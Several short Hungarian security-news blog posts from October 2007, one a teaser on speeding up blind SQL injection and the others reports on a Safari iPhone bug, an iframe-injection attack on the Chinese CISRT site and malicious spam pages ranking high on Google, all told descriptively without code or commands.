A blind (vak) SQL injectiont hagyományosan úgy szokás felfogni, mint egy bináris keresést az ASCII táblán, vagy annak egy részén.  Ennek lépésszáma O(log2 n)-nel arányos, ahol n a teljes ASCII táblát figyelembe véve 255 (a nullbyte nem érdekes), így a logaritmus értéke kb. 8 lesz, azaz átlagosan ennyi kérést kell intéznünk a sebezhető kiszolgálóhoz, hogy egy mező egy karakterét megkapjuk. Persze senki nem szereti felhívni magára a figyelmet, ezért érdemes elgondolkodni azon, hogy hogyan lehetne ezt a számot minál inkább csökkenteni. Stefano Di Paola egy pofonegyszerű ötletet mutat be a blogjában (bár valószínűleg nem ő volt az első, aki ezt a módszert használta, az ötlet tulajdonképpen triviális)

Címkék: sql injection

Safari 0day iPhone-ra

2007.10.03. 19:24 | buherator | Szólj hozzá!

A múltkor hosszan megtalált Safari beta bug úgy tűnik, hogy működik az iPhone-okon. Ennyit az Apple hibabejelentő rendszeréről...

Címkék: safari iphone 0day

Agyafúrt támadás a Kínai Internetbiztonsági Incidenskezelő Központ ellen

2007.10.02. 19:54 | buherator | Szólj hozzá!

Szokatlanul agyafúrt módszerrel próbálták becserkészni a Chinese Internet Security Response Team (CISRT) angol nyelvű oldalának látogatóit. A támadók a szokásos <iframe> injektálós trükkött alkalmazták azzal a csavarral, hogy a veszélyes kód nem minden látogató számára töltődött le.

Ez nagyban megnehezíti a támadás észrevételét valamint annak céljának és módszereinek felderítését. Az eddigi vizsgálatok eredményei azt mutatják, hogy a véletlenszerűen kiválasztott felhasználókat ARP spoofing vagy poisoning segítségével próbálják rávenni, hogy megbízhatatlan tartalmakat töltsön le idegen szerverekről.

Címkék: incidens

Megfertőzték a Google-t

2007.10.02. 19:33 | buherator | 3 komment

Hétvégén uborkaszezon volt, tegnap viszont beindultak a dolgok, csak én nem voltam gépközelben:

Még a blog indulása környékén írtam Ronald véletlen felfedezéséről melynek segítségével elvileg a Google találati listájának élére (vagy legalábbis annak ε sugarú környezetébe ;) lehet kerülni. A most kivitelezett támadás hasonló a bemutatott módszerhez, valamint bevet néhány további régi trükköt.

Jónéhány kínai site elkezdett legitim amerikai oldalakat másolni, valamint gyakori kulcsszavak millióival pumpálták tele magukat, így ezn keresőkifejezések használatakor a valódi oldalakat megelőzve a kínai spammer oldalak kerültek a találati lista élére. Az ezeket meglátogató felhasználók azonban nem a keresőmotor által beindexelt weblapot, hanem egy attól lényegesen különböző, kártékony kóddal telepakolt oldalt kaptak az arcukba. További érdekesség, hogy a spamsiteokat úgy tűnik, senki sem hosztolja, így nem teljesen világos, hogy hogyan kerülhettek be a Google látókörébe.

Bár pánikra egyelőre nincs ok, ha a Google nem tud megoldást taáláni az ilyen jellgű támadások kivédésére, annak nagyon komoly gazdasági következményei lehetnek. Ronald írt erről egy igen lényegretörő cikket, amit mindenkinek ajánlok elolvasásra!


Címkék: google spam malware

süti beállítások módosítása